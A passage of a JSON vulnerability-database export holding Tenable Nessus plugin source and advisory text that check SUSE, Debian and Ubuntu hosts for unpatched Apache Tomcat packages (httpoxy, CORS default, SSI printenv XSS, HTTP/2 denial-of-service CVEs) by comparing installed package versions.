script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-12418\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-9484\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9484\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tomcat6-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tomcat6-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tomcat6-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tomcat6-jsp-2_1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tomcat6-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tomcat6-servlet-2_5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:tomcat6-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES11', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\npkgs = [\n {'reference':'tomcat6-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'tomcat6-admin-webapps-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'tomcat6-docs-webapp-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'tomcat6-javadoc-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'tomcat6-jsp-2_1-api-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'tomcat6-lib-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'tomcat6-servlet-2_5-api-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'tomcat6-webapps-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-11.4'},\n {'reference':'tomcat6-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'},\n {'reference':'tomcat6-admin-webapps-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'},\n {'reference':'tomcat6-docs-webapp-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'},\n {'reference':'tomcat6-javadoc-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'},\n {'reference':'tomcat6-jsp-2_1-api-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'},\n {'reference':'tomcat6-lib-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'},\n {'reference':'tomcat6-servlet-2_5-api-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'},\n {'reference':'tomcat6-webapps-6.0.53-0.57.16', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n exists_check = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release && exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n else if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'tomcat6 / tomcat6-admin-webapps / tomcat6-docs-webapp / etc');\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T14:58:49", "description": "Several minor issues have been fixed in tomcat8, a Java Servlet and JSP engine.\n\nCVE-2016-5388\n\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an 'httpoxy' issue. The 'cgi' servlet now has a 'envHttpHeaders' parameter to filter environment variables.\n\nCVE-2018-8014\n\nThe defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.\n\nCVE-2019-0221\n\nThe SSI printenv command in Apache Tomcat echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-14T00:00:00", "type": "nessus", "title": "Debian DLA-1883-1 : tomcat8 security update (httpoxy)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5388", "CVE-2018-8014", "CVE-2019-0221"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libservlet3.1-java", "p-cpe:/a:debian:debian_linux:libservlet3.1-java-doc", "p-cpe:/a:debian:debian_linux:libtomcat8-java", "p-cpe:/a:debian:debian_linux:tomcat8", "p-cpe:/a:debian:debian_linux:tomcat8-admin", "p-cpe:/a:debian:debian_linux:tomcat8-common", "p-cpe:/a:debian:debian_linux:tomcat8-docs", "p-cpe:/a:debian:debian_linux:tomcat8-examples", "p-cpe:/a:debian:debian_linux:tomcat8-user", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1883.NASL", "href": "https://www.tenable.com/plugins/nessus/127865", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1883-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127865);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2016-5388\", \"CVE-2018-8014\", \"CVE-2019-0221\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Debian DLA-1883-1 : tomcat8 security update (httpoxy)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Several minor issues have been fixed in tomcat8, a Java Servlet and\nJSP engine.\n\nCVE-2016-5388\n\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 3875\nsection 4.1.18 and therefore does not protect applications from the\npresence of untrusted client data in the HTTP_PROXY environment\nvariable, which might allow remote attackers to redirect an\napplication's outbound HTTP traffic to an arbitrary proxy server via a\ncrafted Proxy header in an HTTP request, aka an 'httpoxy' issue. The\n'cgi' servlet now has a 'envHttpHeaders' parameter to filter\nenvironment variables.\n\nCVE-2018-8014\n\nThe defaults settings for the CORS filter provided in Apache Tomcat\nare insecure and enable 'supportsCredentials' for all origins. It is\nexpected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue.\n\nCVE-2019-0221\n\nThe SSI printenv command in Apache Tomcat echoes user provided data\nwithout escaping and is, therefore, vulnerable to XSS. SSI is disabled\nby default. The printenv command is intended for debugging and is\nunlikely to be present in a production website.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/tomcat8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.1-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.1-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat8-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libtomcat8-java\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-admin\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-common\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-docs\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-examples\", reference:\"8.0.14-1+deb8u15\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"tomcat8-user\", reference:\"8.0.14-1+deb8u15\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-25T14:43:20", "description": "It was discovered that the Tomcat 8 SSI printenv command echoed user provided data without escaping it. An attacker could possibly use this issue to perform an XSS attack. (CVE-2019-0221)\n\nIt was discovered that Tomcat 8 did not address HTTP/2 connection window exhaustion on write while addressing CVE-2019-0199. An attacker could possibly use this issue to cause a denial of service.\n(CVE-2019-10072).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-11T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS : Tomcat vulnerabilities (USN-4128-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221", "CVE-2019-10072"], "modified": "2023-02-24T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java", "p-cpe:/a:canonical:ubuntu_linux:tomcat8", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts"], "id": "UBUNTU_USN-4128-1.NASL", "href": "https://www.tenable.com/plugins/nessus/128682", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4128-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128682);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/24\");\n\n script_cve_id(\"CVE-2019-0199\", \"CVE-2019-0221\", \"CVE-2019-10072\");\n script_xref(name:\"USN\", value:\"4128-1\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : Tomcat vulnerabilities (USN-4128-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that the Tomcat 8 SSI printenv command echoed user\nprovided data without escaping it. An attacker could possibly use this\nissue to perform an XSS attack. (CVE-2019-0221)\n\nIt was discovered that Tomcat 8 did not address HTTP/2 connection\nwindow exhaustion on write while addressing CVE-2019-0199. An attacker\ncould possibly use this issue to cause a denial of service.\n(CVE-2019-10072).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4128-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected libtomcat8-java and / or tomcat8 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0221\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2023 Canonical, Inc. / NASL script (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libtomcat8-java\", pkgver:\"8.0.32-1ubuntu1.10\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"tomcat8\", pkgver:\"8.0.32-1ubuntu1.10\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libtomcat8-java\", pkgver:\"8.5.39-1ubuntu1~18.04.3\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"tomcat8\", pkgver:\"8.5.39-1ubuntu1~18.04.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtomcat8-java / tomcat8\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-25T14:43:03", "description": "It was discovered that the Tomcat 9 SSI printenv command echoed user provided data without escaping it. An attacker could possibly use this issue to perform an XSS attack. (CVE-2019-0221)\n\nIt was discovered that Tomcat 9 did not address HTTP/2 connection window exhaustion on write while addressing CVE-2019-0199. An attacker could possibly use this issue to cause a denial of service.\n(CVE-2019-10072).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-19T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 19.04 : Tomcat vulnerabilities (USN-4128-2)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221", "CVE-2019-10072"], "modified": "2023-02-24T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libtomcat9-java", "p-cpe:/a:canonical:ubuntu_linux:tomcat9", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:19.04"], "id": "UBUNTU_USN-4128-2.NASL", "href": "https://www.tenable.com/plugins/nessus/129048", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4128-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129048);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/24\");\n\n script_cve_id(\"CVE-2019-0199\", \"CVE-2019-0221\", \"CVE-2019-10072\");\n script_xref(name:\"USN\", value:\"4128-2\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 19.04 : Tomcat vulnerabilities (USN-4128-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that the Tomcat 9 SSI printenv command echoed user\nprovided data without escaping it. An attacker could possibly use this\nissue to perform an XSS attack. (CVE-2019-0221)\n\nIt was discovered that Tomcat 9 did not address HTTP/2 connection\nwindow exhaustion on write while addressing CVE-2019-0199. An attacker\ncould possibly use this issue to cause a denial of 